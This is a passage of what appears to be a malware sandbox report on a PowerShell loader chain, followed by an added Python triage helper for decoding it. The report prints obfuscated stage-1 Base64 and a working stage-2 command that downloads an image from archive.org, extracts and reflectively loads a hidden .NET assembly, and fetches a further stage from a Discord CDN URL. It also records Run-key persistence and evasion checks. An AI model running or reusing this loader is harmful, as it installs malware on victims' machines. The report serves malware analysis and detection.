? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7?
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB?
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D200BD pushad ; iretd 2_2_00007FF848D200C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D22628 push edx; iretd 2_2_00007FF848D22636
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D300BD pushad ; iretd 4_2_00007FF848D300C1

                      Boot Survival

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\padral.js
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path
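Triage helpers for the loader chain recorded above, added here as a worked example (Python analyst tooling; this is neither Joe Sandbox output nor the sample's own code). The stage-1 `$Codigo` string is UTF-16LE Base64 in which every `A` has been swapped for a glyph that this report renders as `? ? ? ?`; comparing the obfuscated line with the decoded stage-2 command line that follows it confirms the mapping, and the first function simply puts the `A`s back and decodes. The remaining functions parse the six arguments handed to `dnlib.IO.Home.VAI`, un-reverse the `...//:sptth` next-stage URL, and carve a `<<BASE64_START>>`/`<<BASE64_END>>`-delimited blob out of a carrier exactly as stage 2 does. The carrier bytes are constructed (the real `deathnote.jpg` is not reproduced in this report). The roles assigned to `C:\ProgramData\`, `padral` and `InstallUtil` are inferred from the Run key `C:\ProgramData\padral.js` and the InstallUtil.exe activity recorded in this report; the roles of `'1'` and `'desativado'` are not established here.

```python
"""Triage helpers for the two-stage PowerShell loader recorded in this report.
Added example: not Joe Sandbox output and not the sample's own code."""
import base64
import binascii
import re
from typing import List, Optional

START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"

# Stage 1 as copied from the report: UTF-16LE Base64 in which every 'A' was swapped for a
# glyph this report renders as "? ? ? ?" (compare it with the decoded stage-2 command line).
STAGE1_FRAGMENT = (
    "J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9"
    "? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? "
    "C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? "
    "C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? "
    "u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? "
)

# Stage 2 command line, copied from the report.
STAGE2_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden '
    r'-executionpolicy bypass -NoProfile -command "$imageUrl = '
    r"'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';"
    r"$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);"
    r"$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);"
    r"$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';"
    r"$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);"
    r"$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;"
    r"$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);"
    r"$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);"
    r"$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ("
    r"'&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si"
    r"&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/"
    r"moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
    '"'
)

# Constructed stand-in for the "deathnote.jpg" carrier: image-looking junk around the
# marker-delimited blob. The real carrier is not reproduced in this report.
SAMPLE_CARRIER = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00 constructed-not-a-real-image "
    + START_FLAG.encode() + base64.b64encode(b"MZ\x90\x00fake-pe-body") + END_FLAG.encode()
    + b" trailing bytes"
)

VAI_ARGS_RE = re.compile(r"\[object\[\]\]\s*\((.*?)\)\)", re.S)
QUOTED_RE = re.compile(r"'([^']*)'")

def deobfuscate_stage1(obf: str, placeholder: str = "? ? ? ?") -> str:
    """Restore the 'A's, drop whitespace and decode the UTF-16LE Base64 PowerShell text."""
    b64 = re.sub(r"\s+", "", obf.replace(placeholder, "A"))
    b64 = b64[: len(b64) - len(b64) % 4]  # tolerate a fragment cut mid-quantum
    return base64.b64decode(b64).decode("utf-16-le", errors="ignore")

def parse_vai_args(cmdline: str) -> List[str]:
    """Return the single-quoted strings passed to dnlib.IO.Home.VAI via [object[]] (...)."""
    m = VAI_ARGS_RE.search(cmdline)
    return QUOTED_RE.findall(m.group(1)) if m else []

def unreverse_url(s: str) -> str:
    """The loader hands VAI its next-stage URL reversed ('...//:sptth'); undo that."""
    return s[::-1]

def extract_marker_payload(carrier: bytes) -> Optional[bytes]:
    """Carve the Base64 blob between START_FLAG and END_FLAG the way stage 2 does (UTF-8
    decode, IndexOf both flags, Substring, FromBase64String). Returns None when the markers
    are missing or misordered, or when the blob is not valid Base64."""
    text = carrier.decode("utf-8", errors="ignore")
    start, end = text.find(START_FLAG), text.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    try:
        return base64.b64decode(text[start + len(START_FLAG):end], validate=True)
    except binascii.Error:
        return None

def triage(cmdline: str) -> dict:
    """Summarise a stage-2 command line: technique flags plus the VAI argument roles."""
    args = parse_vai_args(cmdline)
    url = unreverse_url(args[0]) if args else ""
    drop_dir = args[2] if len(args) > 2 else ""
    drop_name = args[3] if len(args) > 3 else ""
    return {
        "exec_policy_bypass": re.search(r"-executionpolicy\s+bypass", cmdline, re.I) is not None,
        "marker_carving": START_FLAG in cmdline and END_FLAG in cmdline,
        "reflective_load": "[System.Reflection.Assembly]::Load(" in cmdline,
        "next_stage_url": url if url.startswith(("http://", "https://")) else "",
        # Roles of args 2-4 are inferred from this report's Run key (C:\ProgramData\padral.js)
        # and from InstallUtil.exe being the injected host; args 1 and 5 are not explained here.
        "drop_dir": drop_dir,
        "drop_name": drop_name,
        "host_process": args[4] if len(args) > 4 else "",
        # ".js" comes from the observed Run value, not from the command line itself.
        "run_key_candidate": f"{drop_dir}{drop_name}.js" if drop_dir and drop_name else "",
    }
```

`triage(STAGE2_CMDLINE)` yields the `cdn.discordapp.com/attachments/.../ORIG.txt` URL as the next stage and `C:\ProgramData\padral.js` as the persistence candidate, matching the Run key listed under Boot Survival; `extract_marker_payload` returns None rather than raising when a carrier lacks the markers, which is the branch the original one-liner only evaluates (`$startIndex -ge 0 -and $endIndex -gt $startIndex`) without acting on.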
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (146 occurrences)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX (32 occurrences)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: B70000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 29E0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2810000 memory reserve | memory write watch
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1478
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1891
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4299
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5511
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3909
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5905
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456 Thread sleep count: 4299 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552 Thread sleep count: 5511 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5888 Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -25825441703193356s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -100000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064 Thread sleep count: 3909 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99890s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99781s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99669s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99563s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99453s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99342s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064 Thread sleep count: 5905 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99207s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98940s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98813s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98688s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98563s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98438s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98313s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98202s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98094s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97969s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97859s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97750s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97641s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97521s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97391s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97266s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97156s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -97047s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -96938s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -96813s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99875s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99764s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99655s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99546s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99437s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99325s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99217s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99105s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -99000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98890s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98781s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98666s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98562s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98451s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98343s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1628 Thread sleep time: -98234s >= -30000s
